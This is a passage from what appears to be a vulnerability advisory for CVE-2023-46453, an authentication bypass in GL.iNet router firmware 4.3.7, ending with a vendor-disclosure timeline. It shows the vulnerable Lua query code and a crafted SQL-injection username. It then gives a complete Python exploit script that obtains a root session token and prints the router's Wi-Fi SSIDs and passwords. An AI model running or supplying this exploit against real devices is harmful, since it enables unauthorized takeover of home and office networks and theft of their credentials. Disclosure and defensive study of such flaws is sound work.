nil,<br />thus causing attack to fail.<br /><br />By checking the code we can see that the get_acl_by_username function is<br />actually appending our raw string to a query and then executing it.<br />This means that we can inject a sql query into the username field and<br />make it return a valid aclgroup.<br /><br />------------------------------------------------------------------------<br />M.get_acl_by_username = function(username)<br /> if username == "root" then return "root" end<br /><br /> local db = sqlite3.open(DB)<br /> local sql = string.format("SELECT acl FROM account WHERE username =<br />'%s'", username)<br /><br /> local aclgroup = ""<br /><br /> for a in db:rows(sql) do<br /> aclgroup = a[1]<br /> end<br /><br /> db:close()<br /><br /> return aclgroup<br />end<br />------------------------------------------------------------------------<br /><br />Using this payload we were able to craft a username which is both a valid<br />regex and a valid sql query:<br /><br />roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+<br /><br />this will make the sql query become:<br /><br />SELECT acl FROM account WHERE username = 'roo[^'union selecT<br />char(114,111,111,116)--]:[^:]+:[^:]+'<br /><br />which will return the aclgroup of the root user (root).<br /><br />========================================================================<br />3. Exploit<br />========================================================================<br /><br />------------------------------------------------------------------------<br /># Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass<br /># Date: 18/10/2023<br /># Exploit Author: Daniele 'dzonerzy' Linguaglossa<br /># Vendor Homepage: https://www.gl-inet.com/<br /># Vulnerable Devices:<br /># GL.iNet GL-MT3000 (4.3.7)<br /># GL.iNet GL-AR300M(4.3.7)<br /># GL.iNet GL-B1300 (4.3.7)<br /># GL.iNet GL-AX1800 (4.3.7)<br /># GL.iNet GL-AR750S (4.3.7)<br /># GL.iNet GL-MT2500 (4.3.7)<br /># GL.iNet GL-AXT1800 (4.3.7)<br /># GL.iNet GL-X3000 (4.3.7)<br /># GL.iNet GL-SFT1200 (4.3.7)<br /># And many more...<br /># Version: 4.3.7<br /># Firmware Release Date: 2023/09/13<br /># CVE: CVE-2023-46453<br /><br />from urllib.parse import urlparse<br />import requests<br />import hashlib<br />import random<br />import sys<br /><br /><br />def exploit(url):<br /> try:<br /> requests.packages.urllib3.disable_warnings()<br /> host = urlparse(url)<br /> url = f"{host.scheme}://{host.netloc}/rpc"<br /> print(f"[*] Target: {url}")<br /> print("[*] Retrieving nonce...")<br /> nonce = requests.post(url, verify=False, json={<br /> "jsonrpc": "2.0",<br /> "id": random.randint(1000, 9999),<br /> "method": "challenge",<br /> "params": {"username": "root"}<br /> }, timeout=5).json()<br /> if "result" in nonce and "nonce" in nonce["result"]:<br /> print(f"[*] Got nonce: {nonce['result']['nonce']} !")<br /> else:<br /> print("[!] Nonce not found, exiting... :(")<br /> sys.exit(1)<br /> print("[*] Retrieving authentication token for root...")<br /> md5_hash = hashlib.md5()<br /> md5_hash.update(<br /> f"roo[^'union selecT<br />char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())<br /> password = md5_hash.hexdigest()<br /> token = requests.post(url, verify=False, json={<br /> "jsonrpc": "2.0",<br /> "id": random.randint(1000, 9999),<br /> "method": "login",<br /> "params": {<br /> "username": f"roo[^'union selecT<br />char(114,111,111,116)--]:[^:]+:[^:]+",<br /> "hash": password<br /> }<br /> }, timeout=5).json()<br /> if "result" in token and "sid" in token["result"]:<br /> print(f"[*] Got token: {token['result']['sid']} !")<br /> else:<br /> print("[!] Token not found, exiting... :(")<br /> sys.exit(1)<br /> print("[*] Checking if we are root...")<br /> check = requests.post(url, verify=False, json={<br /> "jsonrpc": "2.0",<br /> "id": random.randint(1000, 9999),<br /> "method": "call",<br /> "params": [token["result"]["sid"], "system", "get_status", {}]<br /> }, timeout=5).json()<br /> if "result" in check and "wifi" in check["result"]:<br /> print("[*] We are authenticated as root! :)")<br /> print("[*] Below some info:")<br /> for wifi in check["result"]["wifi"]:<br /> print(f"[*] --------------------")<br /> print(f"[*] SSID: {wifi['ssid']}")<br /> print(f"[*] Password: {wifi['passwd']}")<br /> print(f"[*] Band: {wifi['band']}")<br /> print(f"[*] --------------------")<br /> else:<br /> print("[!] Something went wrong, exiting... :(")<br /> sys.exit(1)<br /> except requests.exceptions.Timeout:<br /> print("[!] Timeout error, exiting... :(")<br /> sys.exit(1)<br /> except KeyboardInterrupt:<br /> print(f"[!] Something went wrong: {e}")<br /><br /><br />if __name__ == "__main__":<br /> print("GL.iNet Auth Bypass\n")<br /> if len(sys.argv) < 2:<br /> print(<br /> f"Usage: python3 {sys.argv[1]} https://target.com",<br />file=sys.stderr)<br /> sys.exit(0)<br /> else:<br /> exploit(sys.argv[1])<br />------------------------------------------------------------------------<br /><br />========================================================================<br />4. Timeline<br />========================================================================<br /><br />2023/09/13 - Vulnerability discovered<br />2023/09/14 - CVE-2023-46453 requested<br />2023/09/20 - Vendor contacted<br />2023/09/20 - Vendor replied<br />2023/09/30 - CVE-2023-46453 assigned<br />2023/11/08 - Vulnerability patched and fix released<br /><br /></code></pre>